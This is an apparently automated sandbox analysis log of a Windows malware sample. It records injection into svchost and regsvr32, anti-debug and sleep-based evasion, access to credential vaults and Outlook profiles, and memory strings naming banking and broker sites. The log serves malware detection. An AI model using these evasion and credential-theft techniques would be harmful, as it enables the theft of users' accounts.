Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winsqlite3.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: vaultcli.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exeSection loaded: wininet.dllJump to behavior
Source: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\LlbpXphTu9.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
Source: LlbpXphTu9.exeStatic file information: File size 1322495 > 1048576
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: kSsZkfadpV.exe, 00000004.00000000.2265011315.00000000004CE000.00000002.00000001.01000000.00000005.sdmp, kSsZkfadpV.exe, 00000006.00000002.4496679473.00000000004CE000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP source: LlbpXphTu9.exe, 00000000.00000003.2046190994.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, LlbpXphTu9.exe, 00000000.00000003.2042482792.0000000004840000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2248811171.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2345506313.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2246145691.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2345506313.000000000319E000.00000040.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.2349900974.0000000004783000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.4497891561.0000000004ACE000.00000040.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.4497891561.0000000004930000.00000040.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.2343778120.00000000045DB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: LlbpXphTu9.exe, 00000000.00000003.2046190994.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, LlbpXphTu9.exe, 00000000.00000003.2042482792.0000000004840000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2248811171.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2345506313.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2246145691.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2345506313.000000000319E000.00000040.00001000.00020000.00000000.sdmp, regsvr32.exe, regsvr32.exe, 00000005.00000003.2349900974.0000000004783000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.4497891561.0000000004ACE000.00000040.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.4497891561.0000000004930000.00000040.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.2343778120.00000000045DB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: regsvr32.pdb source: svchost.exe, 00000002.00000002.2344998415.0000000000800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2311834897.000000000081A000.00000004.00000020.00020000.00000000.sdmp, kSsZkfadpV.exe, 00000004.00000003.2285016779.0000000000B94000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: regsvr32.exe, 00000005.00000002.4498387058.0000000004F9C000.00000004.10000000.00040000.00000000.sdmp, regsvr32.exe, 00000005.00000002.4496934395.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.00000000031FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2643313904.000000002D5FC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: regsvr32.exe, 00000005.00000002.4498387058.0000000004F9C000.00000004.10000000.00040000.00000000.sdmp, regsvr32.exe, 00000005.00000002.4496934395.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.00000000031FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2643313904.000000002D5FC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: regsvr32.pdbGCTL source: svchost.exe, 00000002.00000002.2344998415.0000000000800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2311834897.000000000081A000.00000004.00000020.00020000.00000000.sdmp, kSsZkfadpV.exe, 00000004.00000003.2285016779.0000000000B94000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_0040EB70 LoadLibraryA,GetProcAddress,0_2_0040EB70
Source: LlbpXphTu9.exeStatic PE information: real checksum: 0xa2135 should be: 0x1431a9
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_004171D1 push ecx; ret 0_2_004171E4
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003940FE push edx; ret 2_2_00394135
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00392250 push ebx; ret 2_2_00392251
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003832E0 push eax; ret 2_2_003832E2
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00381DBE push A829E380h; ret 2_2_00381DC3
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0039E633 push ds; ret 2_2_0039E673
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00398E85 push 00000015h; iretd 2_2_00398ECD
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0039773E push edi; iretd 2_2_00397787
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00398F04 push 00000015h; iretd 2_2_00398ECD
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00397743 push edi; iretd 2_2_00397787
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00381796 push 348A5253h; retf 2_2_0038179B
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00397788 push edi; iretd 2_2_00397787
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00384FFB push cs; ret 2_2_00385014
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030309AD push ecx; mov dword ptr [esp], ecx2_2_030309B6
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049327FA pushad ; ret 5_2_049327F9
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0493225F pushad ; ret 5_2_049327F9
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0493283D push eax; iretd 5_2_04932858
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_049609AD push ecx; mov dword ptr [esp], ecx5_2_049609B6
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_02AF230A push ebx; retf 5_2_02AF230B
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_02AF862D push ds; retf 5_2_02AF8635
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_02AF44A5 push edi; iretd 5_2_02AF44A4
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_02AF4460 push edi; iretd 5_2_02AF44A4
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_02AF445B push edi; iretd 5_2_02AF44A4
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_02AF85FE push 00000073h; iretd 5_2_02AF8600
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_02AEEF6D push ebx; ret 5_2_02AEEF6E
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_02AFB34C push ds; ret 5_2_02AFB390
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_02AFB350 push ds; ret 5_2_02AFB390
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_02AF5BA2 push 00000015h; iretd 5_2_02AF5BEA
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_02AF5C21 push 00000015h; iretd 5_2_02AF5BEA
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_02AE1D18 push cs; ret 5_2_02AE1D31
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_04865426 push ecx; ret 5_2_04865427
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_004772DE IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_004772DE
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004375B0
Source: C:\Users\user\Desktop\LlbpXphTu9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_004440780_2_00444078
Source: C:\Users\user\Desktop\LlbpXphTu9.exeAPI/Special instruction interceptor: Address: 400323C
Source: C:\Windows\SysWOW64\regsvr32.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Windows\SysWOW64\regsvr32.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
Source: C:\Windows\SysWOW64\regsvr32.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
Source: C:\Windows\SysWOW64\regsvr32.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
Source: C:\Windows\SysWOW64\regsvr32.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
Source: C:\Windows\SysWOW64\regsvr32.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\regsvr32.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Windows\SysWOW64\regsvr32.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AD1C0 rdtsc 2_2_030AD1C0
Source: C:\Windows\SysWOW64\regsvr32.exeWindow / User API: threadDelayed 3871Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeWindow / User API: threadDelayed 6102Jump to behavior
Source: C:\Users\user\Desktop\LlbpXphTu9.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-86256
Source: C:\Users\user\Desktop\LlbpXphTu9.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-84986
Source: C:\Users\user\Desktop\LlbpXphTu9.exeAPI coverage: 3.0 %
Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.8 %
Source: C:\Windows\SysWOW64\regsvr32.exeAPI coverage: 2.7 %
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 320Thread sleep count: 3871 > 30Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 320Thread sleep time: -7742000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 320Thread sleep count: 6102 > 30Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 320Thread sleep time: -12204000s >= -30000sJump to behavior
Source: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe TID: 5624Thread sleep time: -70000s >= -30000sJump to behavior
Source: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe TID: 5624Thread sleep count: 40 > 30Jump to behavior
Source: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe TID: 5624Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe TID: 5624Thread sleep count: 39 > 30Jump to behavior
Source: C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe TID: 5624Thread sleep time: -39000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\regsvr32.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452126
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,0_2_0045C999
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,0_2_00436ADE
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00434BEE
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_0045DD7C FindFirstFileW,FindClose,0_2_0045DD7C
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD29
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,0_2_00436D2D
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442E1F
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00475FE5
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8D
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_02AFC470 FindFirstFileW,FindNextFileW,FindClose,5_2_02AFC470
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_02AFC46A FindFirstFileW,FindNextFileW,FindClose,5_2_02AFC46A
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0040E470
Source: 1653200.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: 1653200.5.drBinary or memory string: discord.comVMware20,11696428655f
Source: 1653200.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 1653200.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 1653200.5.drBinary or memory string: global block list test formVMware20,11696428655
Source: 1653200.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: 1653200.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 1653200.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 1653200.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: kSsZkfadpV.exe, 00000006.00000002.4497252665.000000000129F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll
Source: 1653200.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: 1653200.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 1653200.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 1653200.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 1653200.5.drBinary or memory string: outlook.office365.comVMware20,11696428655t
Source: 1653200.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: regsvr32.exe, 00000005.00000002.4496934395.0000000002D50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 1653200.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 1653200.5.drBinary or memory string: outlook.office.comVMware20,11696428655s
Source: 1653200.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 1653200.5.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
Source: firefox.exe, 00000008.00000002.2645263862.000002096D59C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll6
Source: 1653200.5.drBinary or memory string: AMC password management pageVMware20,11696428655
Source: 1653200.5.drBinary or memory string: tasks.office.comVMware20,11696428655o
Source: 1653200.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 1653200.5.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 1653200.5.drBinary or memory string: interactivebrokers.comVMware20,11696428655
Source: 1653200.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: 1653200.5.drBinary or memory string: dev.azure.comVMware20,11696428655j
Source: 1653200.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: 1653200.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: 1653200.5.drBinary or memory string: bankofamerica.comVMware20,11696428655x
Source: 1653200.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: 1653200.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Users\user\Desktop\LlbpXphTu9.exeAPI call chain: ExitProcess graph end nodegraph_0-84836
Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AD1C0 rdtsc 2_2_030AD1C0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003976C3 LdrLoadDll,2_2_003976C3
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_0045A259 BlockInput,0_2_0045A259
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D6D0
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_0040EB70 LoadLibraryA,GetProcAddress,0_2_0040EB70
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_040034A8 mov eax, dword ptr fs:[00000030h]0_2_040034A8
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_04003508 mov eax, dword ptr fs:[00000030h]0_2_04003508
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_04001EB8 mov eax, dword ptr fs:[00000030h]0_2_04001EB8
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B930B mov eax, dword ptr fs:[00000030h]2_2_030B930B
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B930B mov eax, dword ptr fs:[00000030h]2_2_030B930B
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B930B mov eax, dword ptr fs:[00000030h]2_2_030B930B
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]2_2_0306A30B
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]2_2_0306A30B
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]2_2_0306A30B
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C310 mov ecx, dword ptr fs:[00000030h]2_2_0302C310
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03050310 mov ecx, dword ptr fs:[00000030h]2_2_03050310
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F132D mov eax, dword ptr fs:[00000030h]2_2_030F132D
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F132D mov eax, dword ptr fs:[00000030h]2_2_030F132D
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305F32A mov eax, dword ptr fs:[00000030h]2_2_0305F32A
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03027330 mov eax, dword ptr fs:[00000030h]2_2_03027330
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302D34C mov eax, dword ptr fs:[00000030h]2_2_0302D34C
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302D34C mov eax, dword ptr fs:[00000030h]2_2_0302D34C
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03105341 mov eax, dword ptr fs:[00000030h]2_2_03105341
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03029353 mov eax, dword ptr fs:[00000030h]2_2_03029353
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03029353 mov eax, dword ptr fs:[00000030h]2_2_03029353
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov ecx, dword ptr fs:[00000030h]2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FA352 mov eax, dword ptr fs:[00000030h]2_2_030FA352
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EF367 mov eax, dword ptr fs:[00000030h]2_2_030EF367
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D437C mov eax, dword ptr fs:[00000030h]2_2_030D437C
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03037370 mov eax, dword ptr fs:[00000030h]2_2_03037370
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03037370 mov eax, dword ptr fs:[00000030h]2_2_03037370
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03037370 mov eax, dword ptr fs:[00000030h]2_2_03037370
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]2_2_0302E388
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]2_2_0302E388
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]2_2_0302E388
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305438F mov eax, dword ptr fs:[00000030h]2_2_0305438F
